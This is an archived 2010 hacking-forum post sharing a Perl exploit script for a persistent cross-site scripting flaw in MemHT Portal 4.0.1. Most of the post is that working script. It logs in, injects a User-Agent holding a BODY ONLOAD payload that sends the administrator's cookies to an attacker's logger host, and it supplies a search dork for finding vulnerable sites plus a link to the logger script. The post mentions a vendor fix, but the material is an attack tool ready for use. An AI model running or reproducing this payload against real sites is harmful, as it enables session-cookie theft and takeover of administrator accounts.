This forum is in archive mode. You will not be able to post new content.
Pages: [1]

Author Topic: MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]  (Read 2081 times)

0 Members and 1 Guest are viewing this topic.

Offline ZonTa

  • /dev/null
  • *
  • Posts: 10
  • Cookies: 0
  • -[s3cr3tz]-
    • View Profile
MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]
« on: November 27, 2010, 04:57:09 PM »
I wrote this. I reported vendor and he gave me a positive reply. hehe  :)

http://www.exploit-db.com/exploits/15623/

Code: [Select]
#!/usr/bin/perl
# MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]
# by ZonTa - zontahackers[at]gmail[dot]com
#
# After successful inject wait for the admin to view statistic page.
# Fix is available : http://www.memht.com/news_149_MemHT-Portal-4-0-2.html
# Dork : intext:"MemHT Portal is a free software released under the GNU/GPL License by Miltenovik Manojlo"

use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;

my ($host,$id,$username,$password,$logger) = @ARGV;
 
my $http = new LWP::UserAgent;
my $u_agent = "]\"</td></tr><BODY ONLOAD=document.location=\"http://$logger?cookie=\"+document.cookie+\"&redirect=http://$host\">";
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);

Main::Exploit();

package Main;

sub Exploit
{   
    if (@ARGV != 5) {
        Main::Usage();
    }
    else {
        HTTP::UserAgent($u_agent);
        MemHT::Login();     
    }   
}   

sub Usage {
 
return print <<EOF;
+-------------------------------------------------------------------+
| MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability  |
+-------------------------[user agent]------------------------------+

by ZonTa - zontahackers[at]gmail[dot]com
 
Usage: perl exploit.pl host/path userId user pass logger[OPTIONS]

host: target host and memht path
userId: user id
user: valid username
pass: valid password
logger: PHP loging file
 
Example:
perl exploit.pl localhost/memht 2 foo secret 192.168.1.5/logger.php

Download Logger.php -> http://pastebin.com/K6E9AWrC

EOF
}

package MemHT;
       
sub Login
{
    HTTP::Cookies($cookies);
    my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');
     
    if ($response->content =~ /access denied/i) {
        print "Login Failed!\n";
exit;
}
else {
print "Logged In!\n";
print "XSS injected !";
       
    }
}

package HTTP;

sub UserAgent
{
    return $http->agent($_[0]);
}

sub Cookies
{
    return $http->default_header('Cookie' => $_[0]);
}
 
sub GET
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }   
    else {
        return $http->get($_[0]);
    }   
}
     
sub POST
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->post('http://'.$_[0]);
    }   
    else {
        return $http->post($_[0]);
    }   
}
     
sub http_header
{
    return $http->default_header($_[0]);


# Greetz to Sri Lankans 
« Last Edit: November 27, 2010, 06:08:42 PM by ZonTa »
Report to moderator   Logged
- People Hate BlackHats , But They Ignore WhiteHats.
                                                                                 - NeX
Pages: [1]
 



Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.